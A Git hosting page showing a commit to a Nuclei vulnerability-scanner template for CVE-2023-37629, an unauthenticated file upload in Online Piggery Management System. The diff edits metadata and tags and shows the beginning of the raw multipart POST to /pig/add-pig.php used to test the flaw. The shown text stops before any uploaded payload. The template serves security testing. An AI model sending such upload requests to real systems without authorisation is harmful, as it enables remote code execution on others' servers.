daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

info update

patch-1
Ritik Chaddha 2023-09-12 12:50:58 +05:30 committed by GitHub
parent 3518319d95
commit 74eff31e1d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
http/cves/2023/CVE-2023-37629.yaml
View File

@ -1,6 +1,7 @@
id: CVE-2023-37629 id: CVE-2023-37629
info: info:
name: Online Piggery Management System v1.0 - unauthenticated file upload name: Online Piggery Management System v1.0 - Unauthenticated File Upload
author: Harsh author: Harsh
severity: critical severity: critical
description: | description: |
@ -15,7 +16,7 @@ info:
cwe-id: CWE-434 cwe-id: CWE-434
metadata: metadata:
verified: true verified: true
tags: fileupload,unauthenticated,exploitdb tags: cve,cve2023,fileupload,rce,opms
http: http:
- raw: - raw:
@ -23,6 +24,7 @@ http:
POST /pig/add-pig.php HTTP/1.1 POST /pig/add-pig.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="pigno" Content-Disposition: form-data; name="pigno"